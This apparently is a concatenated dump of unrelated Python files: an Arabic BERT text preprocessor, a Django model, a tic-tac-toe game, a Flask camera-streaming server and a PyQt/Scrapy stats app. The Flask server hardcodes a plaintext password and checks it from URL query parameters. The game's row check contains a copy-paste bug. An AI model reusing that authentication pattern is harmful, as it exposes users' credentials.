self.scope.scopeScreenCaptureCopyToPC("siglentImage.png")
# loading image
self.pixmap = QPixmap("siglentImage.png")
# adding image to label
self.pictLabel.setText("Image Here")
self.pictLabel.setPixmap(self.pixmap)
# Optional, resize label to image size
self.pictLabel.resize(self.pixmap.width(),
self.pixmap.height())
if __name__ == '__main__':
app = QCoreApplication.instance()
if app is None:
app = QApplication(sys.argv)
ex = MainWindow()
app.exec_()
|
2,907 | 6c3f60f05adbebe521ba08d7a7e9fc10b1cc914f | import html
import logging
import re
import pyarabic.araby as araby
ACCEPTED_MODELS = [
"bert-base-arabertv01",
"bert-base-arabert",
"bert-base-arabertv02",
"bert-base-arabertv2",
"bert-large-arabertv02",
"bert-large-arabertv2",
"araelectra-base",
"araelectra-base-discriminator",
"araelectra-base-generator",
"aragpt2-base",
"aragpt2-medium",
"aragpt2-large",
"aragpt2-mega",
]
SEGMENTED_MODELS = [
"bert-base-arabert",
"bert-base-arabertv2",
"bert-large-arabertv2",
]
class ArbertmoPreprocessor:
"""
A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.
It also can unprocess the text ouput of the generated text
Args:
model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to "bert-base-arabertv02". Current accepted models are:
- :obj:`"bert-base-arabertv01"`: No farasa segmentation.
- :obj:`"bert-base-arabert"`: with farasa segmentation.
- :obj:`"bert-base-arabertv02"`: No farasas egmentation.
- :obj:`"bert-base-arabertv2"`: with farasa segmentation.
- :obj:`"bert-large-arabertv02"`: No farasas egmentation.
- :obj:`"bert-large-arabertv2"`: with farasa segmentation.
- :obj:`"araelectra-base"`: No farasa segmentation.
- :obj:`"araelectra-base-discriminator"`: No farasa segmentation.
- :obj:`"araelectra-base-generator"`: No farasa segmentation.
- :obj:`"aragpt2-base"`: No farasa segmentation.
- :obj:`"aragpt2-medium"`: No farasa segmentation.
- :obj:`"aragpt2-large"`: No farasa segmentation.
- :obj:`"aragpt2-mega"`: No farasa segmentation.
keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False
remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True
replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True
strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)
strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'
insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words
remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character
Returns:
ArBERTMoPreprocessor: the preprocessor class
Example:
from preprocess import ArBERTMoPreprocessor
arabert_prep = ArBERTMoPreprocessor("aubmindlab/bert-base-arabertv2")
arabert_prep.preprocess("SOME ARABIC TEXT")
"""
def __init__(
self,
model_name,
keep_emojis=False,
remove_html_markup=True,
replace_urls_emails_mentions=True,
strip_tashkeel=True,
strip_tatweel=True,
insert_white_spaces=True,
remove_elongation=True,
):
"""
model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to "bert-base-arabertv02". Current accepted models are:
- :obj:`"bert-base-arabertv01"`: No farasa segmentation.
- :obj:`"bert-base-arabert"`: with farasa segmentation.
- :obj:`"bert-base-arabertv02"`: No farasas egmentation.
- :obj:`"bert-base-arabertv2"`: with farasa segmentation.
- :obj:`"bert-large-arabertv02"`: No farasas egmentation.
- :obj:`"bert-large-arabertv2"`: with farasa segmentation.
- :obj:`"araelectra-base"`: No farasa segmentation.
- :obj:`"araelectra-base-discriminator"`: No farasa segmentation.
- :obj:`"araelectra-base-generator"`: No farasa segmentation.
- :obj:`"aragpt2-base"`: No farasa segmentation.
- :obj:`"aragpt2-medium"`: No farasa segmentation.
- :obj:`"aragpt2-large"`: No farasa segmentation.
- :obj:`"aragpt2-mega"`: No farasa segmentation.
keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False
remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True
replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True
strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)
strip_tatweel(:obj: `bool`): remove tatweel '\\u0640'
insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words
remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character
"""
model_name = model_name.replace("aubmindlab/", "")
if model_name not in ACCEPTED_MODELS:
logging.warning(
"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation"
)
self.model_name = "bert-base-arabertv02"
else:
self.model_name = model_name
if self.model_name in SEGMENTED_MODELS:
logging.info(
"Selected Model requires pre-segmentation, Initializing FarasaSegmenter"
)
try:
from farasa.segmenter import FarasaSegmenter
self.farasa_segmenter = FarasaSegmenter(interactive=True)
except:
logging.warning(
"farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy"
)
else:
logging.info(
"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization"
)
self.keep_emojis = keep_emojis
if self.keep_emojis:
import emoji
self.emoji = emoji
if self.model_name in SEGMENTED_MODELS:
logging.warning(
"Keeping tweets with Farasa Segmentation is 10 times slower"
)
self.remove_html_markup = remove_html_markup
self.replace_urls_emails_mentions = replace_urls_emails_mentions
self.strip_tashkeel = strip_tashkeel
self.strip_tatweel = strip_tatweel
self.insert_white_spaces = insert_white_spaces
self.remove_elongation = remove_elongation
def preprocess(self, text):
"""
Preprocess takes an input text line an applies the same preprocessing used in AraBERT
pretraining
Args:
text (:obj:`str`): inout text string
Returns:
string: A preprocessed string depending on which model was selected
"""
if self.model_name == "bert-base-arabert":
return self._old_preprocess(
text,
do_farasa_tokenization=True,
)
if self.model_name == "bert-base-arabertv01":
return self._old_preprocess(text, do_farasa_tokenization=False)
text = str(text)
text = html.unescape(text)
if self.strip_tashkeel:
text = araby.strip_tashkeel(text)
if self.strip_tatweel:
text = araby.strip_tatweel(text)
if self.replace_urls_emails_mentions:
# replace all possible URLs
for reg in url_regexes:
text = re.sub(reg, " [رابط] ", text)
# REplace Emails with [بريد]
for reg in email_regexes:
text = re.sub(reg, " [بريد] ", text)
# replace mentions with [مستخدم]
text = re.sub(user_mention_regex, " [مستخدم] ", text)
if self.remove_html_markup:
# remove html line breaks
text = re.sub("<br />", " ", text)
# remove html markup
text = re.sub("</?[^>]+>", " ", text)
# remove repeated characters >2
if self.remove_elongation:
text = self._remove_elongation(text)
# insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets
if self.insert_white_spaces:
text = re.sub(
"([^0-9\u0621-\u063A\u0641-\u064A\u0660-\u0669a-zA-Z\[\]])",
r" \1 ",
text,
)
# insert whitespace between words and numbers or numbers and words
text = re.sub(
"(\d+)([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)", r" \1 \2 ", text
)
text = re.sub(
"([\u0621-\u063A\u0641-\u064A\u0660-\u066C]+)(\d+)", r" \1 \2 ", text
)
# remove unwanted characters
if self.keep_emojis:
emoji_regex = "".join(list(self.emoji.UNICODE_EMOJI["en"].keys()))
rejected_chars_regex2 = "[^%s%s]" % (chars_regex, emoji_regex)
text = re.sub(rejected_chars_regex2, " ", text)
else:
text = re.sub(rejected_chars_regex, " ", text)
# remove extra spaces
text = " ".join(text.replace("\uFE0F", "").split())
if (
self.model_name == "bert-base-arabertv2"
or self.model_name == "bert-large-arabertv2"
):
if self.keep_emojis:
new_text = []
for word in text.split():
if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
new_text.append(word)
else:
new_text.append(self.farasa_segmenter.segment(word))
text = " ".join(new_text)
else:
text = self.farasa_segmenter.segment(text)
return self._farasa_segment(text)
# ALl the other models dont require Farasa Segmentation
return text
def unpreprocess(self, text, desegment=True):
"""Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.
The objective is to make the generated text of any model appear natural and not preprocessed.
Args:
text (str): input text to be un-preprocessed
desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.
Returns:
str: The unpreprocessed (and possibly Farasa-desegmented) text.
"""
if self.model_name in SEGMENTED_MODELS and desegment:
text = self.desegment(text)
# removes the spaces around quotation marks ex: i " ate " an apple --> i "ate" an apple
# https://stackoverflow.com/a/53436792/5381220
text = re.sub(white_spaced_double_quotation_regex, '"' + r"\1" + '"', text)
text = re.sub(white_spaced_single_quotation_regex, "'" + r"\1" + "'", text)
text = re.sub(white_spaced_back_quotation_regex, "\`" + r"\1" + "\`", text)
text = re.sub(white_spaced_back_quotation_regex, "\—" + r"\1" + "\—", text)
# during generation, sometimes the models don't put a space after the dot, this handles it
text = text.replace(".", " . ")
text = " ".join(text.split())
# handle decimals
text = re.sub(r"(\d+) \. (\d+)", r"\1.\2", text)
text = re.sub(r"(\d+) \, (\d+)", r"\1,\2", text)
text = re.sub(left_and_right_spaced_chars, r"\1", text)
text = re.sub(left_spaced_chars, r"\1", text)
text = re.sub(right_spaced_chars, r"\1", text)
return text
def desegment(self, text):
"""
Use this function if sentence tokenization was done using
`from arabert.preprocess_arabert import preprocess` with Farasa enabled
AraBERT segmentation using Farasa adds a space after the '+' for prefixes,
and after before the '+' for suffixes
Example:
>>> desegment('ال+ دراس +ات')
الدراسات
"""
text = text.replace("+ ", "+")
text = text.replace(" +", "+")
text = " ".join([self._desegmentword(word) for word in text.split(" ")])
return text
def _desegmentword(self, orig_word: str) -> str:
"""
Word segmentor that takes a Farasa Segmented Word and removes the '+' signs
Example:
>>> _desegmentword("ال+يومي+ة")
اليومية
"""
word = orig_word.replace("ل+ال+", "لل")
if "ال+ال" not in orig_word:
word = word.replace("ل+ال", "لل")
word = word.replace("+", "")
word = word.replace("للل", "لل")
return word
def _old_preprocess(self, text, do_farasa_tokenization):
"""
AraBERTv1 preprocessing Function
"""
text = str(text)
if self.strip_tashkeel:
text = araby.strip_tashkeel(text)
text = re.sub(r"\d+\/[ء-ي]+\/\d+\]", "", text)
text = re.sub("ـ", "", text)
text = re.sub("[«»]", ' " ', text)
if self.replace_urls_emails_mentions:
# replace the [رابط] token with space if you want to clean links
text = re.sub(regex_url_step1, "[رابط]", text)
text = re.sub(regex_url_step2, "[رابط]", text)
text = re.sub(regex_url, "[رابط]", text)
text = re.sub(regex_email, "[بريد]", text)
text = re.sub(regex_mention, "[مستخدم]", text)
text = re.sub("…", r"\.", text).strip()
text = self._remove_redundant_punct(text)
if self.replace_urls_emails_mentions:
text = re.sub(r"\[ رابط \]|\[ رابط\]|\[رابط \]", " [رابط] ", text)
text = re.sub(r"\[ بريد \]|\[ بريد\]|\[بريد \]", " [بريد] ", text)
text = re.sub(r"\[ مستخدم \]|\[ مستخدم\]|\[مستخدم \]", " [مستخدم] ", text)
if self.remove_elongation:
text = self._remove_elongation(text)
if self.insert_white_spaces:
text = re.sub(
"([^0-9\u0621-\u063A\u0641-\u0669\u0671-\u0673a-zA-Z\[\]])",
r" \1 ",
text,
)
if do_farasa_tokenization:
text = self._tokenize_arabic_words_farasa(text)
return text.strip()
def _farasa_segment(self, text):
line_farasa = text.split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
if "+" not in word:
segmented_line.append(word)
continue
segmented_word = self._split_farasa_output(word)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _split_farasa_output(self, word):
segmented_word = []
temp_token = ""
for i, c in enumerate(word):
if c == "+":
# if the token is KAF, it could be a suffix or prefix
if temp_token == "ك":
# if we are at the second token, then KAF is surely a prefix
if i == 1:
segmented_word.append(temp_token + "+")
temp_token = ""
# If the KAF token is between 2 tokens
elif word[i - 2] == "+":
# if the previous token is prefix, then this KAF must be a prefix
if segmented_word[-1][-1] == "+":
segmented_word.append(temp_token + "+")
temp_token = ""
# else it is a suffix, this KAF could not be a second suffix
else:
segmented_word.append("+" + temp_token)
temp_token = ""
# if Kaf is at the end, this is handled with the statement after the loop
elif temp_token in prefix_list:
segmented_word.append(temp_token + "+")
temp_token = ""
elif temp_token in suffix_list:
segmented_word.append("+" + temp_token)
temp_token = ""
else:
segmented_word.append(temp_token)
temp_token = ""
continue
temp_token += c
if temp_token != "":
if temp_token in suffix_list:
segmented_word.append("+" + temp_token)
else:
segmented_word.append(temp_token)
return segmented_word
def _tokenize_arabic_words_farasa(self, line_input):
if self.keep_emojis:
# insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets
line_farasa = []
for word in line_input.split():
if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
line_farasa.append(word)
else:
line_farasa.append(self.farasa_segmenter.segment(word))
else:
line_farasa = self.farasa_segmenter.segment(line_input).split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
segmented_word = []
for token in word.split("+"):
if token in prefix_list:
segmented_word.append(token + "+")
elif token in suffix_list:
segmented_word.append("+" + token)
else:
segmented_word.append(token)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _remove_elongation(self, text):
"""
:param text: the input text to remove elongation
:return: delongated text
"""
# loop over the number of times the regex matched the text
for index_ in range(len(re.findall(regex_tatweel, text))):
elongation = re.search(regex_tatweel, text)
if elongation:
elongation_pattern = elongation.group()
elongation_replacement = elongation_pattern[0]
elongation_pattern = re.escape(elongation_pattern)
text = re.sub(
elongation_pattern, elongation_replacement, text, flags=re.MULTILINE
)
else:
break
return text
def _remove_redundant_punct(self, text):
text_ = text
result = re.search(redundant_punct_pattern, text)
dif = 0
while result:
sub = result.group()
sub = sorted(set(sub), key=sub.index)
sub = " " + "".join(list(sub)) + " "
text = "".join(
(text[: result.span()[0] + dif], sub, text[result.span()[1] + dif :])
)
text_ = "".join(
(text_[: result.span()[0]], text_[result.span()[1] :])
).strip()
dif = abs(len(text) - len(text_))
result = re.search(redundant_punct_pattern, text_)
text = re.sub(r"\s+", " ", text)
return text.strip()
prefix_list = [
"ال",
"و",
"ف",
"ب",
"ك",
"ل",
"لل",
"\u0627\u0644",
"\u0648",
"\u0641",
"\u0628",
"\u0643",
"\u0644",
"\u0644\u0644",
"س",
]
suffix_list = [
"ه",
"ها",
"ك",
"ي",
"هما",
"كما",
"نا",
"كم",
"هم",
"هن",
"كن",
"ا",
"ان",
"ين",
"ون",
"وا",
"ات",
"ت",
"ن",
"ة",
"\u0647",
"\u0647\u0627",
"\u0643",
"\u064a",
"\u0647\u0645\u0627",
"\u0643\u0645\u0627",
"\u0646\u0627",
"\u0643\u0645",
"\u0647\u0645",
"\u0647\u0646",
"\u0643\u0646",
"\u0627",
"\u0627\u0646",
"\u064a\u0646",
"\u0648\u0646",
"\u0648\u0627",
"\u0627\u062a",
"\u062a",
"\u0646",
"\u0629",
]
other_tokens = ["[رابط]", "[مستخدم]", "[بريد]"]
# the never_split list is ussed with the transformers library
prefix_symbols = [x + "+" for x in prefix_list]
suffix_symblos = ["+" + x for x in suffix_list]
never_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))
url_regexes = [
r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)",
r"@(https?|ftp)://(-\.)?([^\s/?\.#-]+\.?)+(/[^\s]*)?$@iS",
r"http[s]?://[a-zA-Z0-9_\-./~\?=%&]+",
r"www[a-zA-Z0-9_\-?=%&/.~]+",
r"[a-zA-Z]+\.com",
r"(?=http)[^\s]+",
r"(?=www)[^\s]+",
r"://",
]
user_mention_regex = r"@[\w\d]+"
email_regexes = [r"[\w-]+@([\w-]+\.)+[\w-]+", r"\S+@\S+"]
redundant_punct_pattern = (
r"([!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ【»؛\s+«–…‘]{2,})"
)
regex_tatweel = r"(\D)\1{2,}"
rejected_chars_regex = r"[^0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘]"
regex_url_step1 = r"(?=http)[^\s]+"
regex_url_step2 = r"(?=www)[^\s]+"
regex_url = r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)"
regex_mention = r"@[\w\d]+"
regex_email = r"\S+@\S+"
chars_regex = r"0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘"
white_spaced_double_quotation_regex = r'\"\s+([^"]+)\s+\"'
white_spaced_single_quotation_regex = r"\'\s+([^']+)\s+\'"
white_spaced_back_quotation_regex = r"\`\s+([^`]+)\s+\`"
white_spaced_em_dash = r"\—\s+([^—]+)\s+\—"
left_spaced_chars = r" ([\]!#\$%\),\.:;\?}٪’،؟”؛…»·])"
right_spaced_chars = r"([\[\(\{“«‘*\~]) "
left_and_right_spaced_chars = r" ([\+\-\<\=\>\@\\\^\_\|\–]) "
|
2,908 | 8baf61a20a64f296304b6a7017a24f1216e3d771 | from django.db import models
from django.contrib.auth.models import User as sUser
TYPES = (
('public', 'public'),
('private', 'private'),
)
#class GroupManager(models.Manager):
# def get_all_users(self):
# return self.extra(where=['users'])
class Group(models.Model):
name = models.CharField(max_length=100, default='')
description = models.TextField()
owner = models.ForeignKey(sUser, related_name='my_own_groups')
users = models.ManyToManyField(sUser, related_name='my_groups')
type = models.CharField(max_length=7, choices=TYPES)
created_at = models.DateField(auto_now=True)
#objects =GroupManager()
def __unicode__(self):
return self.name |
2,909 | 605e088beed05c91b184e26c4a5d2a97cb793759 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 10 11:08:59 2020
@author: rishi
"""
# --------- Global Variables -----------
# Will hold our game board data
board = ["-" for i in range(1,26)]
# Lets us know if the game is over yet
game_still_going = True
# Tells us who the winner is
winner = None
# Tells us who the current player is (X goes first)
current_player = "X"
#List of values to select in our 5 x 5 game
values = [str(i) for i in range(1, 26)]
# ------------- Functions ---------------
# Play a game of tic tac toe
def play_game():
# Show the initial game board
display_board()
# Loop until the game stops (winner or tie)
while game_still_going:
# Handle a turn
handle_turn(current_player)
# Check if the game is over
check_if_game_over()
# Flip to the other player
flip_player()
# Since the game is over, print the winner or tie
if winner == "X" or winner == "O":
print(winner + " won.")
elif winner == None:
print("Tie.")
# Display the game board to the screen
def display_board():
print("\n")
print(board[0] + " | " + board[1] + " | " + board[2] + " | " + board[3] + " | " + board[4] + " 1 | 2 | 3 | 4 | 5")
print(board[5] + " | " + board[6] + " | " + board[7] + " | " + board[8] + " | " + board[9] + " 6 | 7 | 8 | 9 | 10")
print(board[10] + " | " + board[11] + " | " + board[12] +" | " + board[13] + " | " + board[14] + " 11 |12 |13 |14 | 15")
print(board[15] + " | " + board[16] + " | " + board[17] +" | " + board[18] + " | " + board[19] + " 16 |17 |18 |19 | 20")
print(board[20] + " | " + board[21] + " | " + board[22] +" | " + board[23] + " | " + board[24] + " 21 |22 |23 |24 | 25")
print("\n")
# Handle a turn for an arbitrary player
def handle_turn(player):
# Get position from player
print(player + "'s turn.")
position = input("Choose a position from 1-25: ")
# Whatever the user inputs, make sure it is a valid input, and the spot is open
valid = False
while not valid:
# Make sure the input is valid
while position not in values:
position = input("Choose a position from 1-25: ")
# Get correct index in our board list
position = int(position) - 1
# Then also make sure the spot is available on the board
if board[position] == "-":
valid = True
else:
print("You can't go there. Go again.")
# Put the game piece on the board
board[position] = player
# Show the game board
display_board()
# Check if the game is over
def check_if_game_over():
check_for_winner()
check_for_tie()
# Check to see if somebody has won
def check_for_winner():
# Set global variables
global winner
# Check if there was a winner anywhere
row_winner = check_rows()
column_winner = check_columns()
diagonal_winner = check_diagonals()
# Get the winner
if row_winner:
winner = row_winner
elif column_winner:
winner = column_winner
elif diagonal_winner:
winner = diagonal_winner
else:
winner = None
# Check the rows for a win
def check_rows():
# Set global variables
global game_still_going
# Check if any of the rows have all the same value (and is not empty)
row_1 = board[0] == board[1] == board[2] == board[3] == board[4] != "-"
row_2 = board[5] == board[6] == board[7] == board[8] == board[9] != "-"
row_3 = board[10] == board[11] == board[12] == board[13] == board[14] != "-"
row_4 = board[15] == board[16] == board[17] == board[18] == board[19] != "-"
row_5 = board[20] == board[21] == board[22] == board[23] == board[24] != "-"
# If any row does have a match, flag that there is a win
if row_1 or row_2 or row_3 or row_4 or row_5:
game_still_going = False
# Return the winner
if row_1:
return board[0]
elif row_2:
return board[5]
elif row_3:
return board[10]
elif row_4:
return board[15]
elif row_4:
return board[20]
# Or return None if there was no winner
else:
return None
# Check the columns for a win
def check_columns():
# Set global variables
global game_still_going
# Check if any of the columns have all the same value (and is not empty)
column_1 = board[0] == board[5] == board[10] == board[15] == board[20] != "-"
column_2 = board[1] == board[6] == board[11] == board[16] == board[21] != "-"
column_3 = board[2] == board[7] == board[12] == board[17] == board[22] != "-"
column_4 = board[3] == board[8] == board[13] == board[18] == board[23] != "-"
column_5 = board[4] == board[9] == board[14] == board[19] == board[24] != "-"
# If any row does have a match, flag that there is a win
if column_1 or column_2 or column_3 or column_4 or column_5:
game_still_going = False
# Return the winner
if column_1:
return board[0]
elif column_2:
return board[1]
elif column_3:
return board[2]
elif column_4:
return board[3]
elif column_5:
return board[4]
# Or return None if there was no winner
else:
return None
# Check the diagonals for a win
def check_diagonals():
# Set global variables
global game_still_going
# Check if any of the columns have all the same value (and is not empty)
diagonal_1 = board[0] == board[6] == board[12] == board[18] == board[24] != "-"
diagonal_2 = board[4] == board[8] == board[12] == board[16] == board[20] != "-"
# If any row does have a match, flag that there is a win
if diagonal_1 or diagonal_2:
game_still_going = False
# Return the winner
if diagonal_1:
return board[0]
elif diagonal_2:
return board[4]
# Or return None if there was no winner
else:
return None
# Check if there is a tie
def check_for_tie():
# Set global variables
global game_still_going
# If board is full
if "-" not in board:
game_still_going = False
return True
# Else there is no tie
else:
return False
# Flip the current player from X to O, or O to X
def flip_player():
# Global variables we need
global current_player
# If the current player was X, make it O
if current_player == "X":
current_player = "O"
# Or if the current player was O, make it X
elif current_player == "O":
current_player = "X"
# ------------ Start Execution -------------
# Play a game of tic tac toe
play_game() |
2,910 | 5cdedce5f984f53b8e26d1580a9040b26023f247 | import shutil
total, used, free = shutil.disk_usage("/")
print("Total: %d MiB" % (total // (2**20)))
print("Used: %d MiB" % (used // (2**20)))
print("Free: %d MiB" % (free // (2**20)))
from Camera import Camera
import time
import cv2
devices = Camera.getDevicesList()
print(devices)
i=0
Cameras = []
for device in devices:
Cameras.append(Camera(i))
i=i+1
time.sleep(1)
print("Ilość kamer: " + str(len(Cameras)))
import threading
### REST
from flask import render_template, Response
from flask import Flask, jsonify
from flask import abort
from flask import request
Login = "kamil"
Password = "123"
tasks = [
{
'id': 1,
'title': u'Buy groceries',
'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',
'done': False
},
{
'id': 2,
'title': u'Learn Python',
'description': u'Need to find a good Python tutorial on the web',
'done': False
}
]
restAppi = Flask(__name__)
def gen(task_id):
while True:
print("Thread runned " + str(task_id))
#get camera frame
img = Cameras[task_id].getImg()
ret, jpeg = cv2.imencode('.jpg', img)
frame = jpeg.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
@restAppi.route('/video_feed/<int:task_id>')
def video_feed(task_id):
#print(task_id)
return Response(gen(task_id),
mimetype='multipart/x-mixed-replace; boundary=frame')
@restAppi.route('/camerasPreview', methods=['GET'])
def camerasPreview():
login = category = request.args.get('login')
password = content_id = request.args.get('password')
print(login)
print(password)
if (login == Login) and password == Password:
return render_template("CamerasPreview.html", name = "Kamil", camerasCount = len(Cameras))
else: abort(401);
@restAppi.route('/')
def index():
return render_template("index.html")
@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])
def get_tasks():
return jsonify({'tasks': tasks})
@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])
def get_task(task_id):
task = [task for task in tasks if task['id'] == task_id]
if len(task) == 0:
abort(404)
return jsonify({'task': task[0]})
restAppiRunned = False
if __name__ == "__main__":
threading.Thread(target=restAppi.run(debug=False)).start()
#if __name__ == '__main__':
# restAppi.run(debug=False)
|
2,911 | 889d465ceeac57a600b2fa3bd26632edcd90a655 | import sys
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QFont
from PyQt5.QtCore import QCoreApplication
import pymysql
import requests
from twisted.internet import reactor, defer
from scrapy.crawler import CrawlerRunner, CrawlerProcess
from scrapy.utils.project import get_project_settings
from spider.jump_300heroes.jump_300heroes.spiders.my_report import JumpReport
from scrapy.settings import Settings
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from multiprocessing import Process
def db_handle():
con = pymysql.connect(
host='localhost',
user='web',
passwd='web',
charset='utf8',
database='heroes'
)
return con
class Example(QWidget):
class A(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 300, 220)
self.setWindowTitle('Icon')
self.setWindowIcon(QIcon('web.png'))
self.show()
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
#QToolTip.setFont(QFont('SanSerif', 10))
#self.setToolTip('This is a <b>QWidget</b> widget')
#textEdit = QTextEdit()
#self.setCentralWidget(textEdit)
self.qle = QLineEdit("蔽月八云")
self.user = self.qle.text()
self.para = "user={}".format(self.user)
print(self.user, '1')
btn = QPushButton('查询', self)
#btn.setToolTip('This is a <b>QPushButton</b> widget')
btn.resize(btn.sizeHint())
btn.clicked.connect(self.search)
self.txt = QTextEdit()
#self.txt.textChanged.connect(self.adjustSize)
self.battle = QTextEdit()
self.player_status = QTextEdit()
self.create_table()
# 名称不能用Quit、Exit,用了就无法显示,原因不明
exitAction = QAction('Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('application')
exitAction.triggered.connect(qApp.quit)
#self.statusBar()
#menubar = QMainWindow.menuBar()
# Mac OS的状态栏显示不一样
#menubar.setNativeMenuBar(False)
#fileMenu = menubar.addMenu('&File')
#fileMenu.addAction(exitAction)
#toolbar = self.addToolBar('Exit')
#toolbar.addAction(exitAction)
grid = QGridLayout()
grid.setSpacing(10)
grid.addWidget(self.qle, 1, 0)
grid.addWidget(btn, 2, 0)
grid.addWidget(self.txt, 3, 0)
grid.addWidget(self.battle, 1, 1, 3, 1)
grid.addWidget(self.player_status, 4, 0, 2, 2)
grid.addWidget(self.battle_table, 6, 0, 2, 2)
self.setLayout(grid)
self.setGeometry(600, 600, 800, 600)
self.center()
self.setWindowTitle("战绩查询")
self.show()
def create_table(self):
# 设置表
self.battle_table = QTableWidget()
# 表列数,行数在下方读取数据时,根据数据量建立
self.battle_table.setColumnCount(8)
# 设置表头
self.battle_table.setHorizontalHeaderLabels(
['match_id', 'head', 'date', 'time', 'kill_count', 'death', 'support', 'score'])
# 隔行变色
self.battle_table.setAlternatingRowColors(True)
# 整行选中
self.battle_table.setSelectionBehavior(QAbstractItemView.SelectRows)
# 将列调整到跟内容大小相匹配
# self.battle_table.resizeColumnsToContents()
# #将行大小调整到跟内容的大小相匹配
self.battle_table.resizeRowsToContents()
# 点击事件
self.battle_table.doubleClicked.connect(self.on_click)
@pyqtSlot()
def on_click(self):
currentQTableWidgetItem = self.battle_table.selectedItems()[0]
# 点击的行包含的比赛id
#match_id = self.battle_table.item(currentQTableWidgetItem.row(), 0).text()
match_id = currentQTableWidgetItem.text()
print(match_id)
self.showDialog(match_id)
def showDialog(self, match_id):
data = requests.get('http://300report.jumpw.com/api/getmatch?id={}'.format(match_id))
a = self.A()
## 启动爬虫,获取该场比赛所有人的数据
#runner = CrawlerRunner(get_project_settings())
#runner.crawl('JumpReport')
#d = runner.join()
#d.addBoth(lambda _: reactor.stop())
#reactor.run() # 阻塞运行爬虫
#
#text, ok = QInputDialog.getText(self, 'Input Dialog',
# 'Enter your name:')
def searchd(self):
if __name__ == '__main__':
#print(user, '2')
p = Process(target=self.a)
p.start()
p.join()
def search(self):
print(self.user)
print(__name__)
#print(user, '3')
#process = CrawlerProcess(get_project_settings())
#process.crawl('JumpReport')
#process.start()
#process.stop()
#process.put()
# 脚本执行爬虫代码
runner = CrawlerRunner(get_project_settings())
#def search(runner, keyword):
# return runner.crawl(JumpReport, keyword)
#runner = CrawlerProcess()
#dfs = set()
print('a')
runner.crawl('JumpReport', user=self.user)
print(self.user)
d = runner.join()
#dfs.add(d)
#defer.DeferredList(dfs).addBoth(lambda _: reactor.stop())
d.addBoth(lambda _: reactor.stop())
#search(runner, "abcd")
#search(runner, "beat")
#runner.start()
reactor.run() # 阻塞运行爬虫
print("complete")
# runner = CrawlerRunner(get_project_settings())
# dfs = set()
# for domain in range(2):
# d = runner.crawl('JumpReport')
# dfs.add(d)
#
